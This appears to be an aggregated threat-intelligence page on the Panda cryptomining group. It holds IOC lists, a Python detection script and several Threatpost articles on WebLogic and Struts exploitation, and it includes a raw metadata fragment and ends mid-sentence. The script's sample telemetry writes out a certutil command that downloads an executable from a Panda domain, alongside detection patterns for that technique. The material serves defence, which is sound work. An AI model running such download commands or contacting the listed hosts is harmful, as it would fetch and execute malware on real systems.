[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source SNORT® Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>).

## IOCs

### Domains

a45[.]bulehero[.]in
a46[.]bulehero[.]in
a47[.]bulehero[.]in
a48[.]bulehero[.]in
a88[.]bulehero[.]in
a88[.]heroherohero[.]info
a[.]bulehero[.]in
aic[.]fxxxxxxk[.]me
axx[.]bulehero[.]in
b[.]bulehero[.]in
bulehero[.]in
c[.]bulehero[.]in
cb[.]fuckingmy[.]life
cnm[.]idc3389[.]top
down[.]idc3389[.]top
fid[.]hognoob[.]se
fxxk[.]noilwut0vv[.]club
haq[.]hognoob[.]se
idc3389[.]top
idc3389[.]cc
idc3389[.]pw
li[.]bulehero2019[.]club
list[.]idc3389[.]top
mi[.]oops[.]best
mx[.]oops[.]best
nrs[.]hognoob[.]se
oo[.]mygoodluck[.]best
pool[.]bulehero[.]in
pxi[.]hognoob[.]se
pxx[.]hognoob[.]se
q1a[.]hognoob[.]se
qie[.]fxxxxxxk[.]me
rp[.]oiwcvbnc2e[.]stream
uio[.]heroherohero[.]info
uio[.]hognoob[.]se
upa1[.]hognoob[.]se
upa2[.]hognoob[.]se
wiu[.]fxxxxxxk[.]me
yxw[.]hognoob[.]se
zik[.]fxxxxxxk[.]me

### IPs

184[.]168[.]221[.]47
172[.]104[.]87[.]6
139[.]162[.]123[.]87
139[.]162[.]110[.]201
116[.]193[.]154[.]122
95[.]128[.]126[.]241
195[.]128[.]127[.]254
195[.]128[.]126[.]120
195[.]128[.]126[.]243
195[.]128[.]124[.]140
139[.]162[.]71[.]92
3[.]123[.]17[.]223
46[.]173[.]217[.]80
5[.]56[.]133[.]246

### SHA-256

2df8cfa5ea4d63615c526613671bbd02cfa9ddf180a79b4e542a2714ab02a3c1
fa4889533cb03fc4ade5b9891d4468bac9010c04456ec6dd8c4aba44c8af9220
2f4d46d02757bcf4f65de700487b667f8846c38ddb50fbc5b2ac47cfa9e29beb
829729471dfd7e6028af430b568cc6e812f09bb47c93f382a123ccf3698c8c08
8b645c854a3bd3c3a222acc776301b380e60b5d0d6428db94d53fad6a98fc4ec
1e4f93a22ccbf35e2f7c4981a6e8eff7c905bc7dbb5fedadd9ed80768e00ab27
0697127fb6fa77e80b44c53d2a551862709951969f594df311f10dcf2619c9d5
f9a972757cd0d8a837eb30f6a28bc9b5e2a6674825b18359648c50bbb7d6d74a
34186e115f36584175058dac3d34fe0442d435d6e5f8c5e76f0a3df15c9cd5fb
29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f
3ed90f9fbc9751a31bf5ab817928d6077ba82113a03232682d864fb6d7c69976
a415518642ce4ad11ff645151195ca6e7b364da95a8f89326d68c836f4e2cae1
4d1f49fac538692902cc627ab7d9af07680af68dd6ed87ab16710d858cc4269c
8dea116dd237294c8c1f96c3d44007c3cd45a5787a2ef59e839c740bf5459f21
991a9a8da992731759a19e470c36654930f0e3d36337e98885e56bd252be927e
a3f1c90ce5c76498621250122186a0312e4f36e3bfcfede882c83d06dd286da1
9c37a6b2f4cfbf654c0a5b4a4e78b5bbb3ba26ffbfab393f0d43dad9000cb2d3
d5c1848ba6fdc6f260439498e91613a5db8acbef10d203a18f6b9740d2cab3ca
6d5479adcfa4c31ad565ab40d2ea8651bed6bd68073c77636d1fe86d55d90c8d

### Monero Wallets

49Rocc2niuCTyVMakjq7zU7njgZq3deBwba3pTcGFjLnB2Gvxt8z6PsfEn4sc8WPPedTkGjQVHk2RLk7btk6Js8gKv9iLCi (1198.851653275126 XMR)
4AN9zC5PGgQWtg1mTNZDySHSS79nG1qd4FWA1rVjEGZV84R8BqoLN9wU1UCnmvu1rj89bjY4Fat1XgEiKks6FoeiRi1EHhh
44qLwCLcifP4KZfkqwNJj4fTbQ8rkLCxJc3TW4UBwciZ95yWFuQD6mD4QeDusREBXMhHX9DzT5LBaWdVbsjStfjR9PXaV9L
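As an added example (this is not code from the Talos post), the following Python refangs a subset of the defanged IOCs listed above and runs them over a few constructed telemetry events, flagging the three behaviours the analysis describes: Certutil fetching the secondary payload from Panda infrastructure, DNS lookups of Panda domains, and a Gh0st RAT mutex that embeds the C2 as host:port[:service]. The event layout, the exact certutil and ping command lines, and the helper names are assumptions for illustration. It goes slightly beyond the page in one respect: apex entries such as bulehero[.]in are matched as suffixes, so the actor's habit of iterating subdomains on the same zone still produces a hit.

```python
"""Added example, not from the Talos post: refang the page's defanged IOCs and
triage constructed host telemetry for the behaviours described above."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Subset of the defanged domains from the IOC section. Apex entries such as
# bulehero[.]in are matched as suffixes so that new subdomains still hit.
DEFANGED_IOCS = [
    "bulehero[.]in",
    "hognoob[.]se",
    "wiu[.]fxxxxxxk[.]me",
    "fxxk[.]noilwut0vv[.]club",
    "oo[.]mygoodluck[.]best",
    "mi[.]oops[.]best",
]


def refang(ioc: str) -> str:
    """Reverse the defanging used in the IOC list: [.] -> ., [:] -> :, hxxp -> http."""
    s = ioc.strip().replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")
    return re.sub(r"^hxxp", "http", s, flags=re.I)


IOC_DOMAINS = {refang(d).lower() for d in DEFANGED_IOCS}


def host_matches(host: str) -> bool:
    """True if host is an IOC domain or a subdomain of one."""
    h = host.lower().rstrip(".")
    return h in IOC_DOMAINS or any(h.endswith("." + d) for d in IOC_DOMAINS)


@dataclass
class Gh0stMutex:
    host: str
    port: int
    service: Optional[str]


def parse_gh0st_mutex(value: str) -> Optional[Gh0stMutex]:
    """Split the C2 string Panda places in Gh0st's DOWNLOAD_SHELL_MUTEX_NAME,
    e.g. 'oo[.]mygoodluck[.]best:51888:WervPoxySvc' -> host, port, service.
    Returns None for values that do not carry a host:port."""
    parts = refang(value).split(":")
    if len(parts) < 2 or not parts[1].isdigit():
        return None
    return Gh0stMutex(parts[0], int(parts[1]), parts[2] if len(parts) > 2 else None)


URL_RE = re.compile(r"https?://([^/\s:\"']+)", re.I)
CERTUTIL_RE = re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache", re.I)
PING_DELAY_RE = re.compile(r"\bping(?:\.exe)?\s+-n\s+(\d+)\s+(?:127\.0\.0\.1|localhost)", re.I)

# Constructed telemetry as (event_type, detail); the command lines are assumed
# shapes of the Certutil download and ping delay, not captured from a sample.
SAMPLE_EVENTS = [
    ("process", 'certutil.exe -urlcache -split -f "http://wiu.fxxxxxxk.me/sppuihost.exe" sppuihost.exe'),
    ("process", "ping -n 10 127.0.0.1"),
    ("dns", "fxxk.noilwut0vv.club"),
    ("dns", "a46.bulehero.in"),
    ("mutex", "oo.mygoodluck.best:51888:WervPoxySvc"),
    ("dns", "updates.example.com"),
    ("process", 'certutil.exe -urlcache -split -f "http://cdn.example.com/tool.exe" tool.exe'),
]


def triage(events: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Return (event_type, reason) for every event that matches Panda tradecraft."""
    hits = []
    for kind, detail in events:
        if kind == "process":
            url = URL_RE.search(detail)
            if CERTUTIL_RE.search(detail) and url:
                host = url.group(1)
                label = "IOC host" if host_matches(host) else "unlisted host (review)"
                hits.append((kind, f"certutil download from {label} {host}"))
            delay = PING_DELAY_RE.search(detail)
            if delay and int(delay.group(1)) >= 5:
                hits.append((kind, f"ping -n {delay.group(1)} to loopback used as an execution delay"))
        elif kind == "dns" and host_matches(detail):
            hits.append((kind, f"DNS query for IOC domain {detail}"))
        elif kind == "mutex":
            c2 = parse_gh0st_mutex(detail)
            if c2 and host_matches(c2.host):
                hits.append((kind, f"Gh0st RAT mutex with C2 {c2.host}:{c2.port}"))
    return hits


if __name__ == "__main__":
    for kind, reason in triage(SAMPLE_EVENTS):
        print(f"[{kind}] {reason}")
```

Running the module prints one line per hit. The certutil download from an unlisted host is still surfaced for review: a LOLBin fetching an executable is worth a look even before the host reaches the IOC list, which matters for an actor that rotates domains as often as this one.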
"AKB:7992242A-E0F4-4572-BE13-859467611F09", "AKB:9B4E2AEC-697D-42F0-9FED-B010FB1F82ED", "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080"]}, {"type": "canvas", "idList": ["STRUTS_OGNL"]}, {"type": "cert", "idList": ["VU:834067"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0197", "CPAI-2017-0676", "CPAI-2017-1088", "CPAI-2019-0546"]}, {"type": "cisa", "idList": ["CISA:5FE14EDE9F5E20EB9536DC356A82AAB6", "CISA:6D325600F427E8426F81E5829305E20F", "CISA:99DAB57F9B8063F8619B1A418B014DF1"]}, {"type": "cisco", "idList": ["CISCO-SA-20170310-STRUTS2"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350"]}, {"type": "cve", "idList": ["CVE-2017-10271", "CVE-2017-5638", "CVE-2019-2725"]}, {"type": "exploitdb", "idList": ["EDB-ID:43392", "EDB-ID:43458", "EDB-ID:43924", "EDB-ID:46780", "EDB-ID:46814"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:C22F157FABAD412B7D508C7EEC750856", "EXPLOITPACK:CB918002171E00C4EB94DA4B5828BA58", "EXPLOITPACK:E47A4ABCB334901131160C872A570166"]}, {"type": "f5", "idList": ["F5:K43451236", "F5:K90059138"]}, {"type": "fireeye", "idList": ["FIREEYE:2473273CA0F291BCEBB5F99AA3E4F256", "FIREEYE:399092589F455855881447C60B56C21A", "FIREEYE:42E1F284AEBD41C72EC6CD12CDCCD0A6", "FIREEYE:57B0F10A16E18DC672833B1812005B76", "FIREEYE:6B4CFD4290F6444DFC070D828CEC509A", "FIREEYE:C097B41677EDE5F95DB4B84AD6726751"]}, {"type": "github", "idList": ["GHSA-J77Q-2QQG-6989"]}, {"type": "githubexploit", "idList": ["20E0E007-A9C4-58EA-917F-E225D8785B3F", "24A6D0CC-8F53-539E-8FBC-D5222C4BC565", "4F4AF4AC-0953-5098-98D6-592B918B0836", "62E1CDF6-537F-52B5-8ACE-87CDDFB3544D", "7BA07704-21CC-5BFC-A0F9-8FDA2BC84402", "96B2FD46-0F7E-5581-BBA6-E4A48966E225", "9D09C8C3-35C2-51CD-B6E1-6542183770EF", "D2931851-B196-5CD6-AF75-B24EA22F6115", "EEB220AD-2CB0-50FB-A3B9-A87BBC32BA19", "F0C27A65-B942-5D87-B7D9-08451A15456C"]}, {"type": "hackerone", "idList": ["H1:576887"]}, {"type": "hivepro", "idList": ["HIVEPRO:C72A6CAC86F253C92A64FF6B8FCDA675"]}, 
## Related coverage from Threatpost

### Panda Threat Group Mines for Monero With Updated Payload, Targets

_Threatpost, September 17, 2019: [https://threatpost.com/panda-threat-group-mines-for-monero-with-updated-payload-targets/148419/](<https://threatpost.com/panda-threat-group-mines-for-monero-with-updated-payload-targets/148419/>)_

The Panda threat group, best known for launching the widespread and successful 2018 ["MassMiner" cryptomining malware](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>) campaign, has continued to use malware to mine cryptocurrency in more recent attacks. A fresh analysis of the group reveals Panda has adopted newly updated infrastructure, payloads and targeting.

While considered unsophisticated, researchers warn that the threat group has a wide reach and has attacked organizations in banking, healthcare, transportation and IT services. So far, researchers estimate that Panda has made away with more than $100,000 in Monero, and with attacks as recently as August 2019, the threat group isn't ceasing its activities anytime soon, they said.

"Panda's willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information," said Christopher Evans and David Liebenberg with [Cisco's Talos research team](<https://blog.talosintelligence.com/2019/09/panda-evolution.html>).

Researchers first became aware of Panda in the summer of 2018 after they engaged in a widespread illicit mining campaign called "[MassMiner](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>)." During that campaign, the threat actor used MassScan, a legitimate port scanner, to sniff out various vulnerabilities in servers to exploit, including a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>)).

[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/17155626/image4.png>)

The threat group would then exploit the flaws and install malware, which would set about mining for Monero and connecting to a crypto-wallet and mining pool.

Since then, in 2019, researchers said that the threat group has constantly evolved to update its infrastructure, exploits and payloads.

"Shortly thereafter [the 2018 campaign], we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers," researchers said. "We believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems."

Panda has constantly changed the vulnerabilities it targets over the past year. For instance, in January 2019, Talos researchers saw Panda exploiting a recently disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942). And in June 2019, Panda began to target a newer WebLogic vulnerability (CVE-2019-2725), leveraging an updated payload with new features to download a secondary miner payload.

In the most recent campaigns, including one that took place in August 2019, Panda began employing a different set of command-and-control (C2) servers as well as new payload-hosting infrastructure.

In March 2019, for instance, researchers observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. And in August, researchers said they observed several attacker IPs, post-exploit, pulling down payloads from a newer URL and saving the file as "BBBBB" (a slight departure from previous behavior, when the file was saved under a random 20-character name).
Panda would then execute the file via PowerShell.

Panda has changed up its payload over the summer as well, so that its initial payload now uses the Certutil command-line utility, which can be used to obtain certificate authority information and configure Certificate Services, to download the secondary miner payload.

Though the threat actor has swapped up its payloads, targeting and infrastructure, very few of its TTPs (tactics, techniques and procedures) are sophisticated, Cisco's Evans told Threatpost.

For instance, "They attempt to hide their miners using the exact same popular techniques we see with other groups," he told Threatpost. "Their infrastructure is predictable: I can usually peg a new Panda domain as soon as I see it in the data; they tend to just be iterations of each other. Their early infrastructure was registered using an email address that immediately allowed Dave to pivot into their social media in China. They attack the same honeypots day after day with the same payloads. They don't even bother to confirm their victims are running a vulnerable system before they deliver an exploit."

Between swapping up its tactics, domains and payloads, researchers said that Panda has now made more than $100,000 through illicit cryptomining, and moving forward, Panda remains an active threat that system administrators should be wary of.

"There are several ways to detect mining activity but let's focus on the simple solutions of patching and basic security controls," Evans told Threatpost. "If you're running a web-accessible WebLogic server that hasn't been patched against vulnerabilities like CVE-2017-10271, it's likely they have at least targeted the system for exploitation if not actually dropped a miner on it... In addition, if you don't need it open to the Internet, take it off."

### Oracle WebLogic Exploit-fest Continues with GandCrab Ransomware, XMRig

_Threatpost, May 6, 2019: [https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>)_

Malicious activity exploiting the recently disclosed Oracle WebLogic critical deserialization vulnerability (CVE-2019-2725) is surging. Even though there's a patch, tens of thousands of vulnerable machines represent an irresistible target for hackers, according to Unit 42 researchers at Palo Alto Networks, especially since the bug is "trivial" to exploit.

Oracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications.
Oracle released an out-of-band patch on April 26, 2019 \u2013 though exploitation for what was then a zero-day had already begun, researchers said. Quickly thereafter, attacks distributing a never-before-seen [ransomware variant called \u201cSodinokibi\u201d emerged](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>); and then attacks [spreading a new variant](<https://threatpost.com/muhstik-botnet-variant-targets-just-patched-oracle-weblogic-flaw/144253/>) of the Muhstik botnet, which is used to launch distributed-denial-of-service (DDoS) and cryptojacking attacks.\n\nNow, other attacks are starting to snowball, with no sign of abating.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cOnce the vulnerability was made public with the release of the patch, numerous instances of proof-of-concept (PoC) code exploiting the vulnerability were released,\u201d Unit 42 researchers said, in a posting [late last week](<https://unit42.paloaltonetworks.com/attackers-increasingly-targeting-oracle-weblogic-server-vulnerability-for-xmrig-and-ransomware/>). \u201cPreliminary indicators reveal over 600 exploitation attempts targeting CVE-2019-2725 on Palo Alto Networks soak sites and we expect this number to increase rapidly.\u201d\n\nThey added that a scan showed more than 41,000 publicly accessible WebLogic instances in the wild.\n\n\u201cWith this many publicly available WebLogic instances on the internet, as well as an unknown number of private instances in enterprise environments, we expect an escalation of exploitation attempts in the coming days and weeks,\u201d according to the researchers.\n\nThe critical flaw, which has a CVSS score of 9.8, is a remote code execution bug that is remotely exploitable without authentication. Impacted are versions 10.3.6.0.0 and 12.1.3.0.0 of the product. 
Palo Alto pointed out that exploitation does not require any interaction from the user \u2013 a remote, unauthenticated user can send an HTTP request containing a crafted SOAP payload and obtain remote code execution trivially.\n\n\u201cPeople are on the lookout for critical vulnerabilities and seek to jump on them quickly so they can exploit them before patches are applied,\u201d Ryan Olson, vice president of threat intelligence for Unit 42 told Threatpost. \u201cAs we outline in the blog, this isn\u2019t a difficult vulnerability to exploit, particularly given it\u2019s similarity to a previous vulnerability from 2017.\u201d\n\nThat previous vulnerability (CVE-2017-10271) allows a remote, unauthenticated attacker to pass Java-class objects with arbitrary contents, allowing for remote code-execution and in many ways provides a blueprint for the new flaw, according to the researchers.\n\n\u201cThis reinforces the importance of good testing for variant vulnerabilities by vendors when patching vulnerabilities,\u201d Olson told Threatpost.\n\n## XMRig and GandCrab\n\nUnit 42 researchers have observed a wide variety of payloads in addition to Muhstik and Sodinokibi, such as a PowerShell loader that fetches the open-source Monero cryptominer known as XMRig. 
In addition to dropping the miner, it terminates any legitimate Oracle update services that would patch the underlying WebLogic vulnerability, and establishes persistence by copying itself and creating a scheduled task that masquerades as the Oracle update service.\n\nOther attacks are pushing ransomware to infected victims, including [the infamous GandCrab](<https://threatpost.com/gandcrab-decryptor-ransomware/141973/>).\n\n\u201cAt this point, it appears that both ransomware and cryptomining have settled into a stable pattern in terms of use by cybercriminals,\u201d Olson told Threatpost.\n\nThe popularity of WebLogic Server, combined with its tendency to be deployed in business-critical environments, creates an attractive target set for cybercriminals; and exacerbating matters is the fact that there could be \u201can unknown number of private instances in enterprise environments,\u201d Unit 42 researchers said. These are not directly exposed to the web, but an attacker that\u2019s able to penetrate a corporate network could easily uncover them.\n\n\u201cThese would essentially be internal network deployments,\u201d Olson said. 
\u201cThe attacks wouldn\u2019t be different, but the attackers would have to find a means to launch the attack so that it gets into the internal network.\u201d\n\nBusinesses should make every effort to patch, and patch quickly, Olson noted.\n\n\u201cThis is a reminder that the window for exploitation has narrowed and that enterprises need to be able to deploy critical patches like this in a matter of hours and days, not weeks and months,\u201d he told Threatpost.\n", "cvss3": {}, "published": "2019-05-06T20:04:55", "type": "threatpost", "title": "Oracle WebLogic Exploit-fest Continues with GandCrab Ransomware, XMRig", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2019-2725"], "modified": "2019-05-06T20:04:55", "id": "THREATPOST:760547BA8017A91CB7219FE7629E28B3", "href": "https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-04-25T05:49:59", "description": "Though it falls squarely into the trend of cryptominers setting their sights on the Monero virtual currency, the MassMiner malware family is adding its own special somethin\u2019-somethin\u2019 to the mix. 
It targets Windows servers with a variety of recent and well-known exploits \u2013 all within a single executable.\n\nIn fact, MassMiner uses a veritable cornucopia of attacks: The [EternalBlue](<https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/>) National Security Agency hacking tool ([CVE-2017-0143](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)), which it uses to install DoublePulsar and the Gh0st RAT backdoor to establish persistence; an exploit for the well-known Apache Struts flaw that led to the Equifax breach ([CVE-2017-5638](<http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html>)); and an exploit for Oracle\u2019s WebLogic Java application server ([CVE-2017-10271](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>)). It also uses the SQLck tool to gain brute-force access to Microsoft SQL Servers, and it even incorporates a fork of MassScan, a legitimate tool that can scan the internet in under six minutes.\n\n\u201cIt surprised us how many different exploits and hacking tools it leverages,\u201d said AlienVault researchers Chris Doman and Fernando Martinez, who analyzed the code.\n\nThey added that the malware family comprises many different versions, but they all spread first within the local network of its initial host, before attempting to propagate across the wider internet.\n\nAs for the anatomy of the attack, compromised Microsoft SQL Servers are first subjected to scripts that install MassMiner and disable a number of important security features and anti-virus protections.\n\nOnce the malware has been installed, it sets about mining for Monero and hooking up with a crypto-wallet and mining pool; it also connects with its C2 server for updates, and configures itself to infect other machines on the network. 
Meanwhile, a short VisualBasic script is used to deploy the malware to compromised Apache Struts servers, and it moves laterally by replicating itself like a worm. MassScan meanwhile passes a list of both private and public IP ranges to scan during execution, to find fresh server targets out on the web that it can break into with the SQLck brute-force tool.\n\nSo far, the criminals behind the malware have been successful with this kitchen-sink approach: AlienVault in its [analysis](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>) identified two Monero wallets belonging to the attackers.\n\nThe success is unsurprising, according to Ruchika Mishra, director of products and solutions at Balbix.\n\n\u201cGiven [the workforce skills shortage], it\u2019s not hard to imagine a multi-pronged attack such as MassMiner bypassing security systems and staying under the radar with relative ease,\u201d Mishra said via email. \u201cWith the proliferation of coin-mining attacks in 2017 and 2018, I foresee continued innovation and a significant uptick in complexity as the barrier to entry for attackers lowers and iterations of successful exploits become more readily available on the Dark Web.\u201d\n\nWorryingly, other capabilities in the bad code suggest that MassMiner may have loftier goals than simply cryptomining. On the EternalBlue front, it uses the exploit to drop the [DoublePulsar](<https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/>) Windows kernel attack, which is a sophisticated memory-based payload that hooks onto x86 and 64-bit systems and allows an attacker to execute any raw shellcode payload they wish, giving them full control over the system.\n\nMassMiner also uses EternalBlue to install [Gh0st RAT](<https://threatpost.com/eternalblue-exploit-spreading-gh0st-rat-nitol/126052/>), a trojan backdoor for persistence that has targeted the Windows platform for years. 
It was once primarily a nation-state tool used in APT espionage attacks against government agencies, activists and other political targets, until the EternalBlue exploit was used to spread it in other contexts last year.\n\nIncidentally, this is not the only cryptomining malware to make use of the ShadowBrokers\u2019 [release](<https://threatpost.com/shadowbrokers-remain-an-enigma/127072/>) of a trove of NSA exploits. Last week, [a malware called PyRoMine](<https://threatpost.com/pyromine-uses-nsa-exploit-for-monero-mining-and-backdoors/131472/>) that uses the EternalRomance tool was found in the wild mining Monero. Like MassMiner, it has far-ranging and concerning capabilities: It sets up a hidden default account on the victimized machine with system administrator privileges, which can be used for re-infection and further attacks.\n\nThe multi-pronged approach may be unusual, but it showcases the increasingly complex task that businesses have in front of them when it comes to their security postures.\n\n\u201cThe enterprise attack surface is hyper-dimensional and constantly increasing with hundreds of attack vectors. 
Enterprises continue to struggle with not just mapping their attack surfaces, but also identifying which systems are easiest to attack and can be used as a launch point for a breach,\u201d said Mishra.\n", "cvss3": {}, "published": "2018-05-03T20:26:37", "type": "threatpost", "title": "MassMiner Takes a Kitchen-Sink Approach to Cryptomining", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0143", "CVE-2017-10271", "CVE-2017-5638"], "modified": "2018-05-03T20:26:37", "id": "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "href": "https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-08T11:51:46", "description": "UPDATE\n\nA variant of the Muhstik botnet has been uncovered in the wild, exploiting a recently-disclosed, dangerous vulnerability in Oracle WebLogic servers.\n\nThe newfound samples of Muhstik are targeting the [recently-patched CVE-2019-2725](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) in WebLogic servers, and then launching distributed-denial-of-service (DDoS) and cryptojacking attacks with the aim of making money for the attacker behind the botnet, researchers said.\n\n\u201cFrom the timeline, we can see that the developer of Muhstik watches aggressively for new Linux service vulnerability exploits and takes immediate action to [incorporate] exploits against them into the botnet,\u201d Cong Zheng and Yanhui Jia, researchers with Palo Alto Networks\u2019 Unit 42 team, said in a [Tuesday analysis](<https://unit42.paloaltonetworks.com/muhstik-botnet-exploits-the-latest-weblogic-vulnerability-for-cryptomining-and-ddos-attacks/>). 
\u201cThis makes sense, because the faster the botnet includes the new exploits, the greater chance of successfully using the vulnerability to harvest more bots before systems are patched.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nOracle WebLogic is a popular server used for building and deploying enterprise applications. The server\u2019s flaw ([CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>)), meanwhile, has a CVSS score of 9.8 and is a remote code-execution (RCE) bug that is exploitable without authentication. Oracle patched the flaw on April 26.\n\nHowever, researchers first observed exploit traffic for the WebLogic vulnerability coming from three new Muhstik samples on April 28. Muhstik, which has been around since March 2018 and has wormlike self-propagating capabilities, is known to compromise Linux servers and IoT devices, and then launch cryptocurrency mining software and DDoS attacks.\n\nThey saw the exploit traffic being sent from the IP address 165.227.78[.]159, which was transmitting one shell command, to download a PHP webshell.\n\nInterestingly, that IP address (165.227.78[.]159) has previously been used by the Muhstik botnet as a mere reporting server to collect information on bots \u2013 but now, the IP address appears to also be used as a payload host server.\n\nThe discovery shows that new samples of the Muhstik botnet continue to sniff out ripe exploits. 
The botnet had previously targeted an earlier WebLogic vulnerability ([CVE-2017-10271](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271>)), as well as WordPress and [Drupal vulnerabilities.](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>)\n\nUnit 42 researchers told Threatpost that they didn\u2019t have further information on the number of servers impacted.\n\n## Oracle WebLogic\n\nThe latest Oracle WebLogic flaw, which impacts versions 10.3.6 and 12.1.3 of the server, is one such ripe target.\n\nThe flaw could allow an attacker to send a request to a WebLogic server, which would then reach out to a malicious host to complete the request, opening up the impacted server to a remote code-execution attack.\n\nOracle for its part is urging users to update as soon as possible. \u201cDue to the severity of this vulnerability, Oracle recommends that this Security Alert be applied as soon as possible,\u201d Eric Maurice, director of security assurance at Oracle, said in a [recent post](<https://blogs.oracle.com/security/security-alert-cve-2019-2725-released>) about the vulnerability.\n\nOracle didn\u2019t respond to a request for further comment from Threatpost.\n\nHowever, servers that haven\u2019t yet updated are being targeted by several other bad actors, including ones spreading a new [ransomware variant](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) uncovered this week called \u201cSodinokibi.\u201d That ransomware first came onto researchers\u2019 radar on April 25 (the day before a patch was released), after attackers attempted to make an HTTP connection with vulnerable Oracle WebLogic servers.\n\nResearchers for their part warn of a slew of scans checking for the Oracle WebLogic vulnerability, and urge users to update their devices as soon as possible.\n\nhttps://twitter.com/bad_packets/status/1122356384849248258\n\nWhen it comes to Muhstik, Unit 42 researchers 
said that adding this latest exploit to the botnet\u2019s toolkit will increase the number of systems it can infect.\n\n\u201cThe Oracle WebLogic wls9-async RCE vulnerability is now being used by Muhstik botnet in the wild and there is a great possibility that it will be exploited by other malware families in the future,\u201d they said. \u201cUnder the pressure of racing with botnets, both service vendors and users should address new vulnerabilities by releasing patches and installing them respectively.\u201d\n\n_This article was updated on May 2 at 8 am ET to reflect Unit 42 comments._\n", "cvss3": {}, "published": "2019-05-01T14:11:11", "type": "threatpost", "title": "Muhstik Botnet Variant Targets Just-Patched Oracle WebLogic Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2019-2725", "CVE-2020-0688"], "modified": "2019-05-01T14:11:11", "id": "THREATPOST:420EE567E806D93092741D7BB375AC57", "href": "https://threatpost.com/muhstik-botnet-variant-targets-just-patched-oracle-weblogic-flaw/144253/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:58", "description": "Malicious traffic stemming from exploits against the [Apache Struts 2 vulnerability](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>) disclosed and [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) this week has tapered off since Wednesday.\n\nResearchers at Rapid7 published an [analysis](<https://community.rapid7.com/community/infosec/blog/2017/03/09/apache-jakarta-vulnerability-attacks-in-the-wild>) of data collected from its honeypots situated on five major cloud providers and a number of private networks that shows a couple of dozen sources have targeted this vulnerability, but only two, originating in China, have actually sent malicious commands.\n\nCisco Talos said on Thursday that attacks had [risen 
sharply](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) since word leaked of publicly available exploits and a [Metasploit module](<https://github.com/rapid7/metasploit-framework/issues/8064>). But it conceded that it was difficult to ascertain whether probes for vulnerable Apache servers could be carried out benignly.\n\nRapid7 said that in a 72-hour period starting Tuesday, a handful of events cropped up peaking at fewer than 50 between 11 a.m. and 6 p.m. Wednesday.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06230023/pastedImage_1.png>)\n\n\u201cWe are really seeing limited attempts to exploit the vulnerability,\u201d said Tom Sellers, threat analyst and security researcher at Rapid7. \u201cFor context, please keep in mind that our data is from honeypots hosted in cloud providers and may not reflect what other sensors and organizations are seeing.\u201d\n\nCraig Williams, Cisco Talos senior technical lead, said researchers there are seeing attack traffic trending downward as well.\n\n\u201cEarly indicators and past experiences were pointing to this being an ongoing issue with attackers continuing to seek out vulnerable machines. Interestingly, over 